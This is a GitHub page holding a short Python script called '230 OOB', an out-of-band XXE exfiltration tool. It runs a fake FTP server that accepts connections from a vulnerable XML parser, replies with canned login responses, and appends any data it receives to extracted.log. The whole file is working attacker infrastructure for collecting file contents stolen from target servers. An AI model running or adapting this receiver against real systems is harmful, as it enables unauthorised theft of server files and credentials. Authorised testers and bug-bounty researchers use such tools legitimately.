-
Notifications
You must be signed in to change notification settings - Fork 46
/
230.py
77 lines (63 loc) · 2 KB
/
230.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python3
import socket
import sys
import argparse
name = """
=--------------------------------------=
| 230 OOB || an Out-Of-Band XXE tool |
| ____ _____ ___ ___ ____ |
| (___ \(__ / / _ \ / _ \| _ \ |
| __) ) / / | | | | | | | |_) ) |
| / __/ (__ \| | | | | | | _ ( |
| | |___ ___) ) |_| | |_| | |_) ) |
| |_____|____/ \___/ \___/|____/ |
| by Corben Leo |
| |
| - https://www.corben.io |
| - https://hackerone.com/cdl |
| - https://twitter.com/hacker_ |
=--------------------------------------=
"""
print(name)
parser = argparse.ArgumentParser(description='An Out-of-Band XXE tool by Corben Leo')
parser.add_argument('port',type=int,help="Port for the FTP server to listen on (2121 / 21)")
args = parser.parse_args()
HOST = ''
PORT = args.port
welcome = b'220 oob-xxe\n'
ftp_catch_all_response = b'230 more data please!\n'
ftp_user_response = b'331 hello world!\n'
ftp_pass_response = b'230 my password is also hunter2!\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def main():
try:
s.bind((HOST, PORT))
except socket.error as msg:
print('[+] ERROR: Bind failed. ')
sys.exit()
s.listen(10)
print('[+] 230OOB started on port: '+str(PORT))
conn, addr = s.accept()
print('[*] Connection from: '+addr[0]+"!")
conn.sendall(welcome)
while True:
data = conn.recv(1024)
ftp_command = data.split(b" ", 1)
response = {
'user': ftp_user_response,
'pass': ftp_pass_response,
}.get(ftp_command[0].lower(), ftp_catch_all_response)
conn.sendall(response)
line = data.decode('UTF-8')
line = line.replace("\n","").replace("CWD","")
print(line)
extract(line)
s.close()
def extract(data):
fopen = open('./extracted.log', 'a')
fopen.write(data)
fopen.close()
try:
main()
except KeyboardInterrupt:
s.close()